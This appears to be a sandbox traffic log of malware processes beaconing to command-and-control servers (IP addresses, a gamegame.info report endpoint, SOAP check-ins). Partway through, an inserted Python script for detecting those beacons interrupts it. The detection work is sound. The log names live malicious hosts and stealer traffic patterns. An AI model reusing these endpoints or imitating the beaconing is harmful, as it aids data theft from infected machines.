    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=EYTcFf%2BmmFlHJM3V2D%2B6hjaLu%2FyYE6zdOTDhyuoOlXQwgCu1VAKYqbnj3UbbSKXyXdQJAtnpiMlrtG7%2BEoNxyuJfyMNWXDrO0Q3MXpTO6S9rcoYcIkDRrZwdo9n4vw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 66861aa99c8b1649-MUC
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• POST http://185.215.113.55/t5BnOoke2/index.php
  nrbux.exe
  Remote address: 185.215.113.55:80
  Request
    POST /t5BnOoke2/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.55
    Content-Length: 84
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Fri, 02 Jul 2021 07:19:29 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 6
    Content-Type: text/html; charset=UTF-8
• POST http://87.251.71.195:82/
  arnatic_7.exe
  Remote address: 87.251.71.195:82
  Request
    POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
    Host: 87.251.71.195:82
    Content-Length: 137
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
• POST http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address: 104.21.21.221:80
  Request
    POST /report7.4.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Host: iw.gamegame.info
    Content-Length: 278
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 403 Forbidden
    Date: Fri, 02 Jul 2021 07:19:19 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    CF-Chl-Bypass: 1
    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    X-Frame-Options: SAMEORIGIN
    cf-request-id: 0b07af267f00004151ff958000000001
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=mgYtFf9DLghj5Jh%2Bw1tjHxqvxO1S0OTW3VsyFelUlWttj9iDMsLgS8j5tufWZYjitBRBrgHV4qxNOyV5Vz8%2FC2spCOjCHIeS0bKpV%2F1KwiSic3EfAQh8x0rHtneS0A%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 66861aea6bd54151-HAM
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• POST http://87.251.71.195:82/
  arnatic_7.exe
  Remote address: 87.251.71.195:82
  Request
    POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
    Host: 87.251.71.195:82
    Content-Length: 137
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
• POST http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address: 104.21.21.221:80
  Request
    POST /report7.4.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Host: iw.gamegame.info
    Content-Length: 278
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 403 Forbidden
    Date: Fri, 02 Jul 2021 07:19:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    CF-Chl-Bypass: 1
    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    X-Frame-Options: SAMEORIGIN
    cf-request-id: 0b07af4ef600001649af1ec000000001
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Lkx2iR6ONDJwGjx8DgC2t7hVzY0p02QVVVkwqG7HHyaiBEMSsobLd75zSUILNWVbx%2BuzzpubZkAqmXTsdoi1l0gjSitkRLjeBvY8VXWTb%2FzdI7WfgF0EiC3Khgtgeg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 66861b2b293c1649-MUC
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• POST http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address: 104.21.21.221:80
  Request
    POST /report7.4.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Host: iw.gamegame.info
    Content-Length: 278
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 403 Forbidden
    Date: Fri, 02 Jul 2021 07:19:40 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    CF-Chl-Bypass: 1
    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    X-Frame-Options: SAMEORIGIN
    cf-request-id: 0b07af76ec0000fa78cb27e000000001
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=%2BA87z6UQXV6AWJcrdvZ%2FAut9JCelKjE%2FZBPlO0FjDCe5H5Hg7Pczqn2rcr6iVNI06Kl2TktQhjHLXzmJ5ycY%2B4FPSHOGjnLIszLZkDEAPQTFswhnK%2FfhIzKteYAnLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 66861b6b1c9efa78-AMS
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        self.events.data.microsoft.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        self.events.data.microsoft.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        self.events.data.microsoft.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        self-events-data.trafficmanager.net
                                                                                                                                                                                        self-events-data.trafficmanager.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        skypedataprdcolcus11.cloudapp.net
                                                                                                                                                                                        skypedataprdcolcus11.cloudapp.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        52.114.128.74
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:19:50 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07af9ef20000f41b3428f000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=XPRPdF0SF7uUDD6bLQAzg4K7RLH2q9G%2FBM8xKAQFg6B9ZVaU4iaSTQhy01aDdTAxPD8BD1ykATCwq6uknMNZBmiS5gAaEWhknMdbjg%2Fe9JGM8M4MjgeMWyOSYjUy0w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861bab1ed4f41b-LHR
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:20:00 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07afc73300000b6125124000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=2KpmG370NPTVSXp62hmwBkGfUt32q5A2zBNbPx7EgBMWAiZDa%2Bywa%2BHKYMFreCQeDT0LfckMx3wa6C4gjmiMZS4y0EzF%2F%2BunwCDuS4GIDfCCgkb0tSXVTNuyh1AFCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861beb88530b61-OSL
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
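A first-pass triage over the four HTTP flows in this listing, as an added example (not part of the report and not the sandbox's own code). It assumes the record layout shown here (method and URL, process name, remote address, then Request and Response header blocks) and a hypothetical list of browser process names; the sample records are transcribed from the flows above with response headers trimmed to what the checks need. The SOAPAction namespace `http://tempuri.org/Endpoint/` is the default WCF contract name RedLine's C2 client uses, so a POST carrying it to a bare-IP host on a non-web port is the check worth automating. The other two checks catch the `SystemNetworkService` process sending form POSTs under a Chrome User-Agent, and the same 278-byte report retried every 10 s without ever reaching the origin: a 403 with `CF-Chl-Bypass: 1` is Cloudflare's challenge layer answering, not the site behind it.

```python
"""Triage checks over sandbox HTTP flow records (added example, not tria.ge code)."""
import re
from collections import defaultdict
from email.utils import parsedate_to_datetime

# Assumption: process names allowed to present a browser User-Agent.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}

# Constructed sample in the report's layout: the four HTTP flows from this
# listing, response headers trimmed.  Records are separated by blank lines.
SAMPLE = """
• POST http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address: 104.21.21.221:80
  Request
  POST /report7.4.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: iw.gamegame.info
  Content-Length: 278
  Response
  HTTP/1.1 403 Forbidden
  Date: Fri, 02 Jul 2021 07:19:50 GMT
  CF-Chl-Bypass: 1
  Server: cloudflare

• POST http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address: 104.21.21.221:80
  Request
  POST /report7.4.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: iw.gamegame.info
  Content-Length: 278
  Response
  HTTP/1.1 403 Forbidden
  Date: Fri, 02 Jul 2021 07:20:00 GMT
  CF-Chl-Bypass: 1
  Server: cloudflare

• POST http://87.251.71.195:82/
  arnatic_7.exe
  Remote address: 87.251.71.195:82
  Request
  POST / HTTP/1.1
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
  Host: 87.251.71.195:82
  Content-Length: 137

• POST http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address: 104.21.21.221:80
  Request
  POST /report7.4.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: iw.gamegame.info
  Content-Length: 278
  Response
  HTTP/1.1 403 Forbidden
  Date: Fri, 02 Jul 2021 07:20:10 GMT
  CF-Chl-Bypass: 1
  Server: cloudflare
"""


def parse_flows(text):
    """Parse blank-line separated flow records into dicts; header names are lowercased."""
    flows = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = [l.lstrip("• ").strip() for l in block.splitlines()]
        lines = [l for l in lines if l]
        method, url = lines[0].split(None, 1)
        ip, port = lines[2].split("Remote address:", 1)[1].strip().rsplit(":", 1)
        flow = {"method": method, "url": url, "process": lines[1],
                "ip": ip, "port": int(port), "req": {}, "status": None, "resp": {}}
        section = None
        for line in lines[3:]:
            if line == "Request":
                section = "req"
            elif line == "Response":
                section = "resp"
            elif section == "resp" and line.startswith("HTTP/"):
                flow["status"] = int(line.split()[1])
            elif section and ":" in line:          # request/status lines have no colon
                name, value = line.split(":", 1)
                flow[section][name.strip().lower()] = value.strip()
        flows.append(flow)
    return flows


def find_soap_c2(flows):
    """WCF/SOAP calls to a bare-IP host on a non-web port: RedLine-style C2 check-in."""
    hits = []
    for f in flows:
        action = f["req"].get("soapaction", "").strip('"')
        host = f["req"].get("host", "")
        bare_ip = re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}(:\d+)?", host) is not None
        if "tempuri.org/Endpoint/" in action and bare_ip and f["port"] not in (80, 443):
            hits.append((f["process"], f"{f['ip']}:{f['port']}", action))
    return hits


def find_ua_mismatch(flows):
    """A non-browser process presenting a Chrome User-Agent on its own requests."""
    return [(f["process"], f["url"]) for f in flows
            if "Chrome/" in f["req"].get("user-agent", "")
            and f["process"].lower() not in BROWSERS]


def find_blocked_beacons(flows, min_count=3):
    """Repeated same-size POSTs to one URL that only ever get Cloudflare's challenge
    (403 + CF-Chl-Bypass): the report was sent on a timer but never delivered."""
    groups = defaultdict(list)
    for f in flows:
        if f["method"] == "POST":
            groups[(f["process"], f["url"], f["req"].get("content-length"))].append(f)
    found = []
    for (proc, url, clen), fs in groups.items():
        if len(fs) < min_count:
            continue
        if all(f["status"] == 403 and "cf-chl-bypass" in f["resp"] for f in fs):
            times = sorted(parsedate_to_datetime(f["resp"]["date"]) for f in fs)
            gaps = sorted((b - a).total_seconds() for a, b in zip(times, times[1:]))
            found.append({"process": proc, "url": url, "content_length": int(clen),
                          "count": len(fs), "median_gap_s": gaps[len(gaps) // 2]})
    return found


if __name__ == "__main__":
    flows = parse_flows(SAMPLE)
    print("SOAP C2:", find_soap_c2(flows))
    print("UA mismatch:", find_ua_mismatch(flows))
    print("Blocked beacons:", find_blocked_beacons(flows))
```

All three checks lean on the process name the sandbox recorded for each flow; on a host without that attribution the UA-mismatch rule cannot fire, while the SOAPAction and the 403/CF-Chl-Bypass retry pattern are visible on the wire alone.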
• POST http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address: 104.21.21.221:80
  Request
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: iw.gamegame.info
  Content-Length: 278
  Connection: Keep-Alive
  Cache-Control: no-cache
  Response
  HTTP/1.1 403 Forbidden
  Date: Fri, 02 Jul 2021 07:20:10 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  CF-Chl-Bypass: 1
  Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Expires: Thu, 01 Jan 1970 00:00:01 GMT
  X-Frame-Options: SAMEORIGIN
  cf-request-id: 0b07afefa5000062383f094000000001
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=PRqvwgp%2BGnADGCq67r%2B25hXRYe1GwliPqADCHFMtf1SyAwidvpwWsLYfNBStwyuycMXl26mqVHYsGgNxe%2FRxmiZOl4bKO3s%2BNUlAfEep2SI8kRJW6teKuXIVUqrOkA%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 66861c2c3d1a6238-OTP
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

• POST http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address: 104.21.21.221:80
  Request
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: iw.gamegame.info
  Content-Length: 278
  Connection: Keep-Alive
  Cache-Control: no-cache
  Response
  HTTP/1.1 403 Forbidden
  Date: Fri, 02 Jul 2021 07:20:21 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b0184e0000164996924000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=f9p6QtgXWmII6%2FwFT1%2F4InfS8EEIE%2BcyIgDKtr2PAIJpR7BqJxKhDQLVyxkbHnKE3PPowgRcPY5sw1lZ7eAtQLDVr6NU55hQ2bufLpODG%2BI5CoF2nMxdrmmMX%2BkuWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861c6d49551649-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
POST http://185.215.113.55/t5BnOoke2/index.php
nrbux.exe
Remote address: 185.215.113.55:80

Request:
POST /t5BnOoke2/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.55
Content-Length: 84
Cache-Control: no-cache

Response:
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:20:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
GET http://ip-api.com/json/?fields=8198
SystemNetworkService
Remote address: 208.95.112.1:80

Request:
GET /json/?fields=8198 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: ip-api.com
Connection: Keep-Alive
Cache-Control: no-cache

Response:
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:20:31 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 58
Access-Control-Allow-Origin: *
X-Ttl: 27
X-Rl: 39
GET http://ip-api.com/json/?fields=8198
SystemNetworkService
Remote address: 208.95.112.1:80

Request:
GET /json/?fields=8198 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: ip-api.com
Connection: Keep-Alive
Cache-Control: no-cache

Response:
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:20:32 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 58
Access-Control-Allow-Origin: *
X-Ttl: 26
X-Rl: 34
DNS ol.gamegame.info
chrome.exe
Remote address: 8.8.8.8:53

Request:
ol.gamegame.info IN A

Response:
ol.gamegame.info IN A 172.67.200.215
ol.gamegame.info IN A 104.21.21.221
DNS ol.gamegame.info
chrome.exe
Remote address: 8.8.8.8:53

Request:
ol.gamegame.info IN A

Response:
ol.gamegame.info IN A 172.67.200.215
ol.gamegame.info IN A 104.21.21.221
POST http://ol.gamegame.info/report7.4.php
SystemNetworkService
Remote address: 172.67.200.215:80

Request:
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: ol.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache

Response:
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:20:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b043f5000018796a8ed000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=IHfj2hlUwbyFgzbySqGfhrj887ipVce80YCTR%2FYejvZb1B4YECiQF0MBNJp1DmX%2F2cTxCvYGplIIYXLLvmnJl85c44bb6%2FIh6JEM0ipKJIRuM7MPBor5fFaciQAIEg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66861cb329921879-EWR
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
POST http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address: 104.21.21.221:80

Request:
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:20:33 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b046ff00007ceeba298000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=gtHafr7yuir87jCc5y3IT3Zt%2FEz0XcUJSWrKyMeQrygq3TlVeAfMfK%2Fi%2FBa3XsGFG8NYDMPyZqCZbVE7gnIaxfE8SMNWEsQzlzpwtCYMlP74IgjZAdgykg%2F0KUCfSg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861cb7dcc87cee-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
